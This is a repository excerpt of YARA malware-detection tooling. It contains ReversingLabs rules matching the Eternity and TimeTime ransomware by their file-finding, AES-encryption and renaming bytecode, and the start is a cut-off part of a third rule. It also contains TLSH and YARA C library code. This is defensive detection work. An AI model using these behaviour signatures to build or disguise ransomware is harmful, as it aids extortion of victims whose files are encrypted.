8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02 51 | 19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 52 | 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 53 | ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 
6F ?? ?? ?? ?? DC 11 ?? 54 | 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F 55 | ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | all of ($find_files_p*) 62 | ) and 63 | ( 64 | $encrypt_files 65 | ) 66 | } -------------------------------------------------------------------------------- /src/lib/tlshc/tlsh_impl.h: -------------------------------------------------------------------------------- 1 | #ifndef __TLSH_TLSH_IMPL_H__ 2 | #define __TLSH_TLSH_IMPL_H__ 3 | 4 | #include 5 | 6 | #define SLIDING_WND_SIZE 5 7 | 8 | #define BUCKETS 256 9 | #define Q_BITS 2 // 2 bits; quartile value 0, 1, 2, 3 10 | 11 | // BUCKETS_256 & CHECKSUM_3B are compiler switches defined in CMakeLists.txt 12 | 13 | #if defined BUCKETS_256 14 | #define EFF_BUCKETS 256 15 | #define CODE_SIZE 64 // 256 * 2 bits = 64 bytes 16 | #if defined CHECKSUM_3B 17 | #define INTERNAL_TLSH_STRING_LEN 138 18 | #define TLSH_CHECKSUM_LEN 3 19 | // defined in tlsh.h #define TLSH_STRING_LEN 138 // 2 + 3 + 64 bytes = 138 20 | // hexidecimal chars 21 | #else 22 | #define INTERNAL_TLSH_STRING_LEN 134 23 | #define TLSH_CHECKSUM_LEN 1 24 | // defined in tlsh.h #define TLSH_STRING_LEN 134 // 2 + 1 + 64 bytes = 134 25 | // hexidecimal chars 26 | #endif 27 | #endif 28 | 29 | #if defined BUCKETS_128 30 | #define EFF_BUCKETS 128 31 | #define CODE_SIZE 32 // 128 * 2 bits = 32 bytes 32 | #if defined CHECKSUM_3B 33 | #define INTERNAL_TLSH_STRING_LEN 74 34 | #define TLSH_CHECKSUM_LEN 3 35 | // defined in tlsh.h #define TLSH_STRING_LEN 74 // 2 + 3 + 32 bytes = 74 36 | // hexidecimal chars 37 | #else 38 | #define INTERNAL_TLSH_STRING_LEN 70 39 | #define TLSH_CHECKSUM_LEN 1 40 | // defined in tlsh.h #define TLSH_STRING_LEN 70 // 2 + 1 + 32 bytes = 70 41 | // hexidecimal chars 42 | #endif 43 | #endif 44 | 45 | #if defined BUCKETS_48 46 | #define INTERNAL_TLSH_STRING_LEN 33 47 | #define EFF_BUCKETS 48 48 | 
#define CODE_SIZE 12 // 48 * 2 bits = 12 bytes 49 | #define TLSH_CHECKSUM_LEN 1 50 | // defined in tlsh.h #define TLSH_STRING_LEN 30 // 2 + 1 + 12 bytes = 30 51 | // hexidecimal chars 52 | #endif 53 | 54 | #ifdef __cplusplus 55 | extern "C" 56 | { 57 | #endif 58 | 59 | #pragma pack(push) 60 | #pragma pack(1) 61 | 62 | typedef struct 63 | { 64 | unsigned char checksum[TLSH_CHECKSUM_LEN]; 65 | unsigned char lvalue; 66 | union 67 | { 68 | unsigned char qb; 69 | struct 70 | { 71 | #if defined(WORDS_BIGENDIAN) 72 | unsigned char q2ratio : 4; 73 | unsigned char q1ratio : 4; 74 | #else 75 | unsigned char q1ratio : 4; 76 | unsigned char q2ratio : 4; 77 | #endif 78 | } QR; 79 | } Q; 80 | unsigned char tmp_code[CODE_SIZE]; 81 | } LshBinStruct; 82 | 83 | #pragma pack(pop) 84 | 85 | typedef struct TlshImpl 86 | { 87 | unsigned int *a_bucket; 88 | unsigned char slide_window[SLIDING_WND_SIZE]; 89 | unsigned int data_len; 90 | LshBinStruct lsh_bin; 91 | char *lsh_code; 92 | bool lsh_code_valid; 93 | } TlshImpl; 94 | 95 | TlshImpl *tlsh_impl_new(); 96 | void tlsh_impl_free(TlshImpl *impl); 97 | 98 | int tlsh_impl_update( 99 | TlshImpl *impl, 100 | const unsigned char *data, 101 | unsigned int len, 102 | int tlsh_option); 103 | void tlsh_impl_final(TlshImpl *impl, int fc_cons_option); 104 | void tlsh_impl_reset(TlshImpl *impl); 105 | int tlsh_impl_is_valid(TlshImpl *impl); 106 | int tlsh_impl_compare(TlshImpl *impl, TlshImpl *other); 107 | int tlsh_impl_total_diff(TlshImpl *impl, TlshImpl *other, bool len_diff); 108 | int tlsh_impl_lvalue(TlshImpl *impl); 109 | int tlsh_impl_q1ratio(TlshImpl *impl); 110 | int tlsh_impl_q2ratio(TlshImpl *impl); 111 | int tlsh_impl_checksum(TlshImpl *impl, int k); 112 | int tlsh_impl_bucket_value(TlshImpl *impl, int bucket); 113 | int tlsh_impl_histogram_count(TlshImpl *impl, int bucket); 114 | int tlsh_impl_from_tlsh_str(TlshImpl *impl, const char *str); 115 | const char *tlsh_impl_hash(TlshImpl *impl, bool showvers); 116 | 117 | #ifdef __cplusplus 
118 | } 119 | #endif 120 | 121 | #endif // __TLSH_TLSH_IMPL_H__ -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Eternity : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "ETERNITY" 12 | description = "Yara rule that detects Eternity ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Eternity" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? 22 | ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08 23 | 6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F 24 | ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 25 | ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 26 | 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 27 | ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 28 | 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 29 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 30 | 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A 31 | } 32 | 33 | $encrypt_files = { 34 | 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02 35 | 28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ?? 36 | ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? 37 | ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 
16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 38 | 08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F 39 | ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A 40 | } 41 | 42 | $aes_encrypt = { 43 | 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? 44 | ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? 45 | ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? 46 | ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? 47 | ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 48 | ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 49 | 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A 50 | } 51 | 52 | $encrypt_pass = { 53 | 72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 54 | 08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E 55 | ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 56 | 16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 57 | ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A 58 | } 59 | 60 | condition: 61 | uint16(0) == 0x5A4D and 62 | ( 63 | $find_files 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) and 68 | ( 69 | $aes_encrypt 70 | ) and 71 | ( 72 | $encrypt_pass 73 | ) 74 | } -------------------------------------------------------------------------------- /src/lib/include/yara/bitmask.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2018. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. 
Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_BITMASK_H 31 | #define YR_BITMASK_H 32 | 33 | #include 34 | 35 | // 36 | // Utility macros for working with bitmaps. 
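//
// Declare a bitmask of n bits:
//   YR_BITMASK my_bitmask[YR_BITMASK_SIZE(n)];
//
// Clear all bits:
//   yr_bitmask_clear_all(my_bitmask)
//
// Set bit n to 1:
//   yr_bitmask_set(my_bitmask, n)
//
// Clear bit n (set to 0):
//   yr_bitmask_clear(my_bitmask, n)
//
// Check if bit n is set:
//   yr_bitmask_is_set(my_bitmask, n)
//
// None of the per-bit macros range-check `i`: the caller must guarantee
// i < n, otherwise the access lands outside the array. The macros that
// rely on sizeof(bm) (clear_all, print) only work on an actual array,
// never on a YR_BITMASK* such as the parameters of
// yr_bitmask_find_non_colliding_offset() below.
//

#define YR_BITMASK unsigned long

// Bits per slot; 1UL below must stay in step with the slot type.
#define YR_BITMASK_SLOT_BITS (sizeof(YR_BITMASK) * 8)
// Slots needed for n bits. Always rounds up by one extra slot, even when n
// is a multiple of the slot width, which is harmless over-allocation.
#define YR_BITMASK_SIZE(n) (((n) / (YR_BITMASK_SLOT_BITS)) + 1)

#define yr_bitmask_set(bm, i) \
  do \
  { \
    (bm)[(i) / YR_BITMASK_SLOT_BITS] |= 1UL << ((i) % YR_BITMASK_SLOT_BITS); \
  } while (0)

#define yr_bitmask_clear(bm, i) \
  do \
  { \
    (bm)[(i) / YR_BITMASK_SLOT_BITS] &= ~( \
        1UL << ((i) % YR_BITMASK_SLOT_BITS)); \
  } while (0)

#define yr_bitmask_clear_all(bm) memset((bm), 0, sizeof(bm))

#define yr_bitmask_is_set(bm, i) \
  ((bm)[(i) / YR_BITMASK_SLOT_BITS] & (1UL << ((i) % YR_BITMASK_SLOT_BITS)))

#define yr_bitmask_is_not_set(bm, i) (!yr_bitmask_is_set(bm, i))

// Debug helper: dumps every slot as 16 hex digits, one per line. The loop
// counter is size_t so the comparison against sizeof() is not a
// signed/unsigned mismatch.
#define yr_bitmask_print(bm) \
  { \
    size_t i; \
    for (i = 0; i < sizeof(bm) / sizeof((bm)[0]); i++) \
    { \
      printf("%016lX\n", (bm)[i]); \
    } \
  }

uint32_t yr_bitmask_find_non_colliding_offset(
    YR_BITMASK* a,
    YR_BITMASK* b,
    uint32_t len_a,
    uint32_t len_b,
    uint32_t* off_a);

#endif

--------------------------------------------------------------------------------
/src/exp/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara:
--------------------------------------------------------------------------------
rule ByteCode_MSIL_Ransomware_TimeTime : tc_detection malicious
{
    meta:

        author = "ReversingLabs"

        source = "ReversingLabs"
        status = "RELEASED"
        sharing = "TLP:WHITE"
        category = "MALWARE"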
malware = "TIMETIME" 12 | description = "Yara rule that detects TimeTime ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "TimeTime" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $rename_files = { 21 | 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ?? 22 | ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 | 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 24 | 6F ?? ?? ?? ?? 00 DC 2A 25 | } 26 | 27 | $find_files = { 28 | 00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ?? 29 | ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 30 | 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 31 | 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C 32 | ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? 33 | ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 34 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F 35 | ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 36 | ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 37 | 32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ?? 38 | ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ?? 39 | 00 00 DE ?? 06 0C 2B ?? 08 2A 40 | } 41 | 42 | $encrypt_folder = { 43 | 00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 44 | 00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73 45 | ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19 46 | 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 
11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ?? 47 | 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C 48 | ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? 49 | ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A 50 | } 51 | 52 | $encrypt_files = { 53 | 00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ?? 54 | ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B 55 | ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ?? 56 | 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ?? 57 | ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E 58 | ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A 59 | } 60 | 61 | condition: 62 | uint16(0) == 0x5A4D and 63 | ( 64 | $find_files 65 | ) and 66 | ( 67 | $encrypt_files 68 | ) and 69 | ( 70 | $encrypt_folder 71 | ) and 72 | ( 73 | $rename_files 74 | ) 75 | } -------------------------------------------------------------------------------- /src/lib/simple_str.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2022. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. 
Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
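*/

// NOTE(review): the include targets did not survive extraction of this page;
// the list below is what the code in this file needs -- confirm against the
// upstream file.
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <yara/mem.h>
#include <yara/simple_str.h>

// Appends the text produced by `fmt`/`va` to `ss`, growing the buffer when
// needed.
//
// Returns true on success. Returns false, leaving `ss` unchanged, when the
// format fails, the result would not fit the 32-bit length field, or the
// buffer cannot be grown. len/cap are assumed to be 32-bit unsigned (the
// original stored the new capacity in a uint32_t) -- confirm in simple_str.h.
static bool sstr_vappendf(SIMPLE_STR* ss, const char* fmt, va_list va)
{
  // vsnprintf consumes the argument list, so measure on a copy and keep the
  // original list for the real write below.
  va_list va2;
  va_copy(va2, va);
  int size = vsnprintf(NULL, 0, fmt, va2);
  va_end(va2);

  if (size < 0)
    return false;

  // Room required: existing bytes + formatted bytes + terminating NUL.
  // Computed in 64 bits so the check itself cannot wrap.
  uint64_t needed = (uint64_t) ss->len + (uint64_t) size + 1;

  if (needed > UINT32_MAX)
    return false;

  if (ss->cap < needed)
  {
    // Geometric growth plus a small constant so short strings do not
    // reallocate on every append; clamped so the doubling cannot wrap.
    uint64_t grown = (needed - 1) * 2 + 64;
    uint32_t new_size = grown > UINT32_MAX ? UINT32_MAX : (uint32_t) grown;

    char* tmp = yr_realloc(ss->str, new_size);

    if (!tmp)
      return false;  // ss->str is still the old, valid buffer

    ss->str = tmp;
    ss->cap = new_size;
  }

  // Bound the write by the room actually left after the current contents,
  // not by the whole capacity; the growth above guarantees it fits.
  int written = vsnprintf(ss->str + ss->len, ss->cap - ss->len, fmt, va);

  if (written < 0)
    return false;

  ss->len += (uint32_t) written;

  return true;
}

// Creates a string holding a copy of `s`, or an empty string when `s` is
// NULL. Returns NULL on allocation failure or when `s` is too long for the
// 32-bit length field. The result is owned by the caller and released with
// sstr_free().
SIMPLE_STR* sstr_new(const char* s)
{
  SIMPLE_STR* ss = yr_calloc(1, sizeof(SIMPLE_STR));

  if (!ss)
    return NULL;

  if (s)
  {
    size_t slen = strlen(s);

    // Refuse rather than silently truncate the length into 32 bits.
    if (slen >= UINT32_MAX)
    {
      yr_free(ss);
      return NULL;
    }

    ss->str = yr_malloc(slen + 1);

    if (!ss->str)
    {
      yr_free(ss);
      return NULL;
    }

    memcpy(ss->str, s, slen + 1);
    ss->len = (uint32_t) slen;
    // cap records the allocation size, NUL included, which is what the
    // growth check in sstr_vappendf() compares against.
    ss->cap = (uint32_t) slen + 1;
  }

  return ss;
}

// Creates a string from a printf-style format. Returns NULL when allocation
// or formatting fails; on success the caller owns the result.
SIMPLE_STR* sstr_newf(const char* fmt, ...)
{
  SIMPLE_STR* ss = sstr_new(NULL);

  if (!ss)
    return NULL;

  va_list va;
  va_start(va, fmt);
  bool ret = sstr_vappendf(ss, fmt, va);
  va_end(va);

  if (ret)
    return ss;

  sstr_free(ss);

  return NULL;
}

// Releases `ss` and its buffer. NULL is accepted and ignored.
void sstr_free(SIMPLE_STR* ss)
{
  if (ss)
  {
    yr_free(ss->str);
    yr_free(ss);
  }
}

// Appends printf-style formatted text to `ss`. Returns false (string
// unchanged) on formatting or allocation failure.
bool sstr_appendf(SIMPLE_STR* ss, const char* fmt, ...)
{
  va_list vlist;
  va_start(vlist, fmt);
  bool ret = sstr_vappendf(ss, fmt, vlist);
  va_end(vlist);

  return ret;
}

// Detaches the NUL-terminated buffer from `ss` and hands ownership to the
// caller, who must release it with yr_free(). `ss` is left empty and still
// usable. Returns NULL for a NULL `ss` or one that never held text.
char* sstr_move(SIMPLE_STR* ss)
{
  if (!ss)
    return NULL;

  char* ret = ss->str;
  ss->str = NULL;
  ss->len = 0;
  ss->cap = 0;

  return ret;
}

--------------------------------------------------------------------------------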